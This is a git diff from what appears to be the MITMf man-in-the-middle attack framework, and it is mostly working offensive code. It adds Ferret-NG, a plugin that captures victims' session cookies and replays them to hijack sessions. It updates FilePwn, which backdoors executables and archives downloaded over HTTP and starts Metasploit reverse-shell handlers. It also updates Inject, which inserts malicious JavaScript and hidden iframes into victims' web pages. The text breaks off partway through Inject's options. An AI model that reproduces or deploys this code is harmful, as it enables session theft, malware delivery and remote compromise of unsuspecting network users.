- def handleHeader(self, request, key, value):
+ def serverHeaders(self, response, request):
'''Handles all response headers'''
- request.client.headers['Expires'] = "0"
- request.client.headers['Cache-Control'] = "no-cache"
+ response.headers['Expires'] = "0"
+ response.headers['Cache-Control'] = "no-cache"
- def connectionMade(self, request):
+ def clientRequest(self, request):
'''Handles outgoing request'''
- request.headers['Pragma'] = 'no-cache'
- for h in self.bad_headers:
- if h in request.headers:
- request.headers[h] = ""
+ request.headers['pragma'] = 'no-cache'
+ for header in self.bad_headers:
+ if header in request.headers:
+ del request.headers[header]
\ No newline at end of file
diff --git a/plugins/FerretNG.py b/plugins/FerretNG.py
new file mode 100644
index 0000000..42c426a
--- /dev/null
+++ b/plugins/FerretNG.py
@@ -0,0 +1,105 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import ast
+import sys
+
+from datetime import datetime
+from plugins.plugin import Plugin
+from twisted.internet import reactor
+from twisted.web import http
+from twisted.internet import reactor
+from core.utils import shutdown
+from core.ferretng.FerretProxy import FerretProxy
+from core.ferretng.URLMonitor import URLMonitor
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class FerretNG(Plugin):
+ name = "Ferret-NG"
+ optname = "ferretng"
+ desc = "Captures cookies and starts a proxy that will feed them to connected clients"
+ version = "0.1"
+ has_opts = True
+
+ def initialize(self, options):
+ '''Called if plugin is enabled, passed the options namespace'''
+ self.options = options
+ self.ferret_port = 10010 or options.ferret_port
+ self.cookie_file = None
+
+ URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
+
+ if options.cookie_file:
+ self.tree_info.append('Loading cookies from log file')
+ try:
+ with open(options.cookie_file, 'r') as cookie_file:
+ self.cookie_file = ast.literal_eval(cookie_file.read())
+ URLMonitor.getInstance().cookies = self.cookie_file
+ cookie_file.close()
+ except Exception as e:
+ shutdown("[-] Error loading cookie log file: {}".format(e))
+
+ self.tree_info.append("Listening on port {}".format(self.ferret_port))
+
+ def onConfigChange(self):
+ mitmf_logger.info("[Ferret-NG] Will now hijack captured sessions from {}".format(self.config['Ferret-NG']['Client']))
+ URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
+
+ def clientRequest(self, request):
+ if 'cookie' in request.headers:
+ host = request.headers['host']
+ cookie = request.headers['cookie']
+ client = request.client.getClientIP()
+
+ if client not in URLMonitor.getInstance().cookies:
+ URLMonitor.getInstance().cookies[client] = []
+
+ for entry in URLMonitor.getInstance().cookies[client]:
+ if host == entry['host']:
+ mitmf_logger.debug("{} [Ferret-NG] Updating captured session for {}".format(client, host))
+ entry['host'] = host
+ entry['cookie'] = cookie
+ return
+
+ mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie))
+ URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie})
+
+ def pluginReactor(self, StrippingProxy):
+ FerretFactory = http.HTTPFactory(timeout=10)
+ FerretFactory.protocol = FerretProxy
+ reactor.listenTCP(self.ferret_port, FerretFactory)
+
+ def pluginOptions(self, options):
+ options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)')
+ options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from a log file')
+
+ def finish(self):
+ if not URLMonitor.getInstance().cookies:
+ return
+
+ if self.cookie_file == URLMonitor.getInstance().cookies:
+ return
+
+ mitmf_logger.info("[Ferret-NG] Writing cookies to log file")
+ with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file:
+ cookie_file.write(str(URLMonitor.getInstance().cookies))
+ cookie_file.close()
diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py
index ed3e774..2d40f54 100644
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@@ -61,25 +61,26 @@ import logging
import shutil
import random
import string
+import threading
import tarfile
import multiprocessing
from libs.bdfactory import pebin
from libs.bdfactory import elfbin
from libs.bdfactory import machobin
-from core.msfrpc import Msfrpc
+from core.msfrpc import Msf
+from core.utils import shutdown
from plugins.plugin import Plugin
from tempfile import mkstemp
from configobj import ConfigObj
-mitmf_logger = logging.getLogger('mitmf')
+mitmf_logger = logging.getLogger("mitmf")
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
desc = "Backdoor executables being sent over http using bdfactory"
- implements = ["handleResponse"]
- tree_output = ["BDFProxy v0.3.2 online"]
+ tree_info = ["BDFProxy v0.3.2 online"]
version = "0.3"
has_opts = False
@@ -110,21 +111,8 @@ class FilePwn(Plugin):
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
- #Metasploit options
- msfcfg = options.configfile['MITMf']['Metasploit']
- rpcip = msfcfg['rpcip']
- rpcpass = msfcfg['rpcpass']
-
- try:
- self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
- self.msf.login('msf', rpcpass)
- version = self.msf.call('core.version')['version']
- self.tree_output.append("Connected to Metasploit v%s" % version)
- except Exception:
- sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
-
#FilePwn options
- self.userConfig = options.configfile['FilePwn']
+ self.userConfig = self.config['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
@@ -138,31 +126,36 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']
- self.tree_output.append("Setting up Metasploit payload handlers")
-
- jobs = self.msf.call('job.list')
+ msfversion = Msf().version()
+ self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
+
+ t = threading.Thread(name='setupMSF', target=self.setupMSF)
+ t.setDaemon(True)
+ t.start()
+
+ def setupMSF(self):
+ msf = Msf()
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
cmd = "use exploit/multi/handler\n"
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
cmd += "set LHOST {}\n".format(config["HOST"])
cmd += "set LPORT {}\n".format(config["PORT"])
+ cmd += "set ExitOnSession False\n"
cmd += "exploit -j\n"
- if jobs:
- for pid, name in jobs.iteritems():
- info = self.msf.call('job.info', [pid])
- if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
- #Create a virtual console
- c_id = self.msf.call('console.create')['id']
-
- #write the cmd to the newly created console
- self.msf.call('console.write', [c_id, cmd])
+ pid = msf.findpid('multi/handler')
+ if pid:
+ info = msf.jobinfo(pid)
+ if (info['datastore']['payload'] == config["MSFPAYLOAD"]) and (info['datastore']['LPORT'] == config["PORT"]) and (info['datastore']['lhost'] != config['HOST']):
+ msf.killjob(pid)
+ msf.sendcommand(cmd)
+ else:
+ msf.sendcommand(cmd)
else:
- #Create a virtual console
- c_id = self.msf.call('console.create')['id']
+ msf.sendcommand(cmd)
- #write the cmd to the newly created console
- self.msf.call('console.write', [c_id, cmd])
+ def onConfigChange(self):
+ self.initialize(self.options)
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
@@ -351,7 +344,7 @@ class FilePwn(Plugin):
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
print "[!] TarFile over allowed size"
- mitmf_logger.info("TarFIle maxSize met %s", len(aTarFileBytes))
+ mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
self.patched.put(aTarFileBytes)
return
@@ -423,7 +416,7 @@ class FilePwn(Plugin):
if keywordCheck is True:
print "[!] Tar blacklist enforced!"
- mitmf_logger.info('Tar blacklist enforced on %s', info.name)
+ mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
continue
# Try to patch
@@ -444,14 +437,14 @@ class FilePwn(Plugin):
info.size = os.stat(file2).st_size
with open(file2, 'rb') as f:
newTarFile.addfile(info, f)
- mitmf_logger.info("%s in tar patched, adding to tarfile", info.name)
+ mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
with open(tmp.name, 'rb') as f:
newTarFile.addfile(info, f)
- mitmf_logger.info("%s patching failed. Keeping original file in tar.", info.name)
+ mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
if patchCount == int(self.userConfig['TAR']['patchCount']):
mitmf_logger.info("Met Tar config patchCount limit.")
@@ -479,7 +472,7 @@ class FilePwn(Plugin):
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
print "[!] ZipFile over allowed size"
- mitmf_logger.info("ZipFIle maxSize met %s", len(aZipFile))
+ mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
self.patched.put(aZipFile)
return
@@ -536,7 +529,7 @@ class FilePwn(Plugin):
if keywordCheck is True:
print "[!] Zip blacklist enforced!"
- mitmf_logger.info('Zip blacklist enforced on %s', info.filename)
+ mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
continue
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
@@ -546,12 +539,12 @@ class FilePwn(Plugin):
file2 = "backdoored/" + os.path.basename(info.filename)
print "[*] Patching complete, adding to zip file."
shutil.copyfile(file2, tmpDir + '/' + info.filename)
- mitmf_logger.info("%s in zip patched, adding to zipfile", info.filename)
+ mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
- mitmf_logger.info("%s patching failed. Keeping original file in zip.", info.filename)
+ mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
print '-' * 10
@@ -587,46 +580,46 @@ class FilePwn(Plugin):
self.patched.put(tempZipFile)
return
- def handleResponse(self, request, data):
+ def serverResponse(self, response, request, data):
- content_header = request.client.headers['Content-Type']
- client_ip = request.client.getClientIP()
+ content_header = response.headers['Content-Type']
+ client_ip = response.getClientIP()
if content_header in self.zipMimeTypes:
if self.bytes_have_format(data, 'zip'):
- mitmf_logger.info("%s Detected supported zip file type!" % client_ip)
+ mitmf_logger.info("[FilePwn] {} Detected supported zip file type!".format(client_ip))
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
process.daemon = True
process.start()
- process.join()
+ #process.join()
bd_zip = self.patched.get()
if bd_zip:
- mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
- return {'request': request, 'data': bd_zip}
+ mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
+ return {'response': response, 'request': request, 'data': bd_zip}
else:
for tartype in ['gz','bz','tar']:
if self.bytes_have_format(data, tartype):
- mitmf_logger.info("%s Detected supported tar file type!" % client_ip)
+ mitmf_logger.info("[FilePwn] {} Detected supported tar file type!".format(client_ip))
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
process.daemon = True
process.start()
- process.join()
+ #process.join()
bd_tar = self.patched.get()
if bd_tar:
- mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
- return {'request': request, 'data': bd_tar}
+ mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
+ return {'response': response, 'request': request, 'data': bd_tar}
elif content_header in self.binaryMimeTypes:
for bintype in ['pe','elf','fatfile','machox64','machox86']:
if self.bytes_have_format(data, bintype):
- mitmf_logger.info("%s Detected supported binary type!" % client_ip)
+ mitmf_logger.info("[FilePwn] {} Detected supported binary type ({})!".format(client_ip, bintype))
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)
@@ -634,15 +627,14 @@ class FilePwn(Plugin):
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
process.daemon = True
process.start()
- process.join()
+ #process.join()
patchb = self.patched.get()
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
- mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
- return {'request': request, 'data': bd_binary}
+ mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
+ return {'response': response, 'request': request, 'data': bd_binary}
- else:
- mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
- return {'request': request, 'data': data}
\ No newline at end of file
+ mitmf_logger.debug("[FilePwn] {} File is not of supported Content-Type: {}".format(client_ip, content_header))
+ return {'response': response, 'request': request, 'data': data}
\ No newline at end of file
diff --git a/plugins/Inject.py b/plugins/Inject.py
index 6f9df18..d86b5ef 100644
--- a/plugins/Inject.py
+++ b/plugins/Inject.py
@@ -19,116 +19,104 @@
#
import logging
-logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
-from scapy.all import get_if_addr
import time
import re
import sys
import argparse
+
+from core.utils import SystemConfig
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
-mitmf_logger = logging.getLogger('mitmf')
+mitmf_logger = logging.getLogger("mitmf")
class Inject(CacheKill, Plugin):
name = "Inject"
optname = "inject"
- implements = ["handleResponse", "handleHeader", "connectionMade"]
- has_opts = True
desc = "Inject arbitrary content into HTML content"
- version = "0.2"
- depends = ["CacheKill"]
+ version = "0.3"
+ has_opts = True
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
- self.options = options
- self.proxyip = options.ip_address
- self.html_src = options.html_url
- self.js_src = options.js_url
- self.rate_limit = options.rate_limit
- self.count_limit = options.count_limit
- self.per_domain = options.per_domain
- self.black_ips = options.black_ips
- self.white_ips = options.white_ips
- self.match_str = options.match_str
- self.html_payload = options.html_payload
+ self.options = options
+ self.our_ip = SystemConfig.getIP(options.interface)
+ self.html_src = options.html_url
+ self.js_src = options.js_url
+ self.rate_limit = options.rate_limit
+ self.count_limit = options.count_limit
+ self.per_domain = options.per_domain
+ self.black_ips = options.black_ips.split(',')
+ self.white_ips = options.white_ips.split(',')
+ self.white_domains = options.white_domains.split(',')
+ self.black_domains = options.black_domains.split(',')
+ self.match_str = "" or options.match_str
+ self.html_payload = options.html_payload
+ self.ctable = {}
+ self.dtable = {}
+ self.count = 0
+ self.mime = "text/html"
- if self.white_ips:
- temp = []
- for ip in self.white_ips.split(','):
- temp.append(ip)
- self.white_ips = temp
+ if not options.preserve_cache:
+ CacheKill.initialize(self, options)
- if self.black_ips:
- temp = []
- for ip in self.black_ips.split(','):
- temp.append(ip)
- self.black_ips = temp
-
- if self.options.preserve_cache:
- self.implements.remove("handleHeader")
- self.implements.remove("connectionMade")
-
- if options.html_file is not None:
- self.html_payload += options.html_file.read()
-
- self.ctable = {}
- self.dtable = {}
- self.count = 0
- self.mime = "text/html"
-
- def handleResponse(self, request, data):
+ def serverResponse(self, response, request, data):
#We throttle to only inject once every two seconds per client
#If you have MSF on another host, you may need to check prior to injection
- #print "http://" + request.client.getRequestHostname() + request.uri
- ip, hn, mime = self._get_req_info(request)
- if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""):
- if hn not in self.proxyip: #prevents recursive injecting
+ #print "http://" + response.client.getRequestHostname() + response.uri
+ ip, hn, mime = self._get_req_info(response)
+ if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.our_ip):
+ if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count += 1
- mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
- return {'request': request, 'data': data}
- else:
- return
+ mitmf_logger.info("{} [{}] Injected malicious html: {}".format(ip, self.name, hn))
+
+ return {'response': response, 'request':request, 'data': data}
def _get_payload(self):
return self._get_js() + self._get_iframe() + self.html_payload
- def add_options(self,options):
- options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
- options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
- options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
- options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
- options.add_argument("--match-str", type=str, default="